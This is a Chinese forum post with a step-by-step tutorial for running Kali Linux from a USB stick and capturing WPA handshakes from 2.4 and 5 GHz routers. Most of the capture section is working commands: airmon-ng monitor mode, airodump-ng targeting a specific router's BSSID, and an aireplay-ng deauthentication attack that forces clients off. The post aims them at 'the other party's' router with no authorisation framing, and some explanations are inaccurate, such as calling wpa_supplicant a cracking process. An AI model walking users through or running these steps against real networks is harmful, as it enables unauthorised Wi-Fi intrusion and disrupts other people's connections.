本帖最后由 pengdejiang 于 2022-1-14 15:46 编辑
网上到处没有完整的 kali系统安装到U盘和抓5G握手包的教程,又觉得虚拟机安装kali始终不方便,经过一个星期不断的搜索资料,测试,学习,搞明白了如何实现2.4g+5g +中文名称ssid抓包,并且只需要一个U盘安装kali系统,在任何电脑上运行(与电脑操作系统无关)。期间,光研究kali安装到U盘并且支持记录操作(持久化)就搞了2天,因为网上各种说需要下载官方的live版本才能写u盘,实际是错误的。我吧kali官方系统从2017-2020全部一个一个下载下来试写到u盘,发现不同版本的要么没有中文,要么不支持U盘持久化(可写和记录)。然后又是各种更新源(有的版本会失败),搞中文,安装驱动(在线安装,有的行有的不行),一步一步艰难实践,最后发现走了不少弯路。现在把总结写出来供大家抄作业1.准备一个大于8g的U盘。 2.准备一张rtl8812au网卡,我是买的创维电视拆的无线模块,15块钱,正好是rtl8812,还可以在widows xp和win7使用(需要安装特殊驱动),也可以在kali使用。 3.所有的操作过程,我用Excel记录,命令全部写好在表格内并做中文注释,各项注意事项也备注清楚了。4.软件和驱动内有下载地址和方法,如果搞不来我可以分享百度盘链接。
大约方法:1.下载kali系统历史版本地址(无需番羽土啬):http://old.kali.org/kali-images/ 我们需要kali-linux-2019.2-amd64.iso位这个版本,其它版本不要尝试会失败
2.下载github8812无线网卡各版本驱动地址(需要番羽土啬,并使用谷歌浏览器打开):https://github.com/aircrack-ng/rtl8812au (我们需要rtl8812au-5.2.0版本)
3.下载Win32DiskImager_v1.0.exe 这个百度搜下,用于写镜像到U盘
4.下载minitoolpartition wizard---pw11-free.exe 这个百度搜下 用于分区。
5.安装kali:1.使用win32工具写镜像到U盘
2.打开minitool创建persistence分区(持久化分区)
设置好后, 点击apply开始制作镜像,会将U盘分为三个区而且带启动分区,支持U盘启动,制作完成。
6. 1.持久化分区
我是联想笔记本F2设置启动,选择不带EFI的U盘启动,笔记本F12是选择启动项,设置好U盘启动后开机(注意如果有两个U盘选项,选择不带EFFI的选项),开机后弹出下图菜单,选第四项进入。为避免进入笔记本系统后自带无线网卡干扰网卡顺序,在bios禁用笔记本自带无线网卡。
2.进系统,打开终端,输入:fdisk -l 检查挂载硬盘情况名称等,确认persistence分区对应sdb3,如果是sda3,那么待会下面命令跟着把sdb3改为sda3
mkdir -p /mnt/linux 创建一个路径为/mnt/linux的文件夹
mount /dev/sdb3 /mnt/linux/ 将分区挂载到上一步的文件夹下
echo "/ union" >/mnt/linux/persistence.conf 创建配置文件
umount /dev/sdb3 卸载分区挂载
3.完成后,点击kali系统右上角的关机键关机,重新开机,在桌面新建一个文件夹,随便命名为 111,然后在kali系统点击重启,验证持久化是否成功。如果失败,重复上面持久化命令步骤再试。(有失败的可能,多试两次一定可以成功)
4.持久化成功后,在桌面空白处右键 点击 setting 设置,选择Region&Language设置中文,选Language为汉语,下面一排Formats(字体)会自动变成汉语,然后提示 restart,点击restart,然后点击log out会注销,进入桌面后再重启验证中文是否设置正常。
5.重新进入系统已经是中文,打开另一个存储了驱动的U盘,将“rtl8812au-5.2.0”驱动文件夹复制到系统桌面,打开该文件夹,在文件夹内空白处点击右键,选择 打开终端,然后输入命令:
make 制作驱动 需要约3分钟
make install 待制作驱动完成后,输入左边命令 安装驱动
reboot 完成后重启系统
打开终端,输入命令:
iwconfig 识别到网卡代表驱动安装正确 网卡wlan0 模式:model Managed
到此,系统和驱动已完全安装到U盘,并且支持在U盘kali 运行、保存文件,在kali和电脑自带硬盘、外接U盘之前互相拷贝文件。
注意网卡不是8812au的可以省去驱动安装环节,实际测试3070网卡 8187网卡无需安装驱动,kali应该是集成了驱动可以直接识别,只是这两个不支持5g频道。
抓包操作:
.抓包前,先在系统文件夹 主目录 内新建文件夹命名为 cap,用于存放抓到的握手包。
1.打开aircrack-ng,输入命令:
iwconfig 查看网卡状态
airmon-ng start wlan0 打开无线网卡监听模式,此时提示Found 2 processes that could cause trouble(有两个干扰进程影响)
提示有两个干扰进程(不同电脑可能提示更多干扰进程),其中的NetworkManager是系统本身的wifi连接管理进程,PID代号是1199(每次不一样代号),另一个wpa_supplicant是破解密码监听的进程,PID代号是1273(每次不一样),输入命令kill 1199关闭系统wifi管理进程,保留1273这个wpa_supplicant进程(如果关闭该进程会出现监听不到路由器)。
下面关键的来了:输入命令
airodump-ng -C 5180-5885 wlan0 指定扫描频率为5G区间。(要扫描2.4G区间段就把5100改为2400)此-C(大写C)代表指定频率,不指定频率无法正常扫描,注意若是其它网卡最后那个就不是wlan0而是wlan0mon(只有8812网卡不变好像)以上操作完成后,会弹出扫描窗口,正常的话能扫描到多个路由,看频道号发现有5G频道的,等待几分钟后,按住键盘的左下角 Ctrl键加C键 两个键停止扫描。
airodump-ng -c 149 -w /root/cap/F2-5G --bssid5C:92:5E:C2:8A:B0 wlan0 监听目标路由命令,说明:输入airodump-ng是扫描监听命令 输入-c(小写c)代表指定频道和目标路由一样,输入149是频道号,根据实际对方路由频道更改,输入-w 代表把握手包文件放到指定位置(这是代表在主目录),输入/root/cap/是文件路径,输入F2-5G是文件名称,可以随意。输入 --bssid是指定路由mac地址,wlan0是网卡序号(如果网卡是wlan0mon就对应改一下))
以上监听一直运行不用关闭,现在新开一个终端命令窗口,输入下面指令对目标路由器发动攻击:
aireplay-ng -0 50 -a 5C:92:5E:C2:8A:B0 -D wlan0 输入aireplay-ng启动攻击命令,输入-0代表 取消认证,输入50代表攻击次数,输入-a 代表指定路由mac地址,5C:92:5E:C2:8A:B0根据实际路由mac地址复制替换,输入-D代表不检测路由,这个很重要,不加入-D抓包失败,输入wlan0是网卡序号(如果是wlan0mon对应更改)
正常情况下,只要你不是离对方路由和手机过远,一分钟内获得握手包。抓包成功的提示是右上角出现 WPA handshake(翻译:握手包)。如要停止抓包,在窗口内按住电脑 Ctrl键加C键 两个键来停止。
| 
[复制链接]
IP卡
狗仔卡
发表于 2022-1-7 12:18
提升卡
置顶卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡
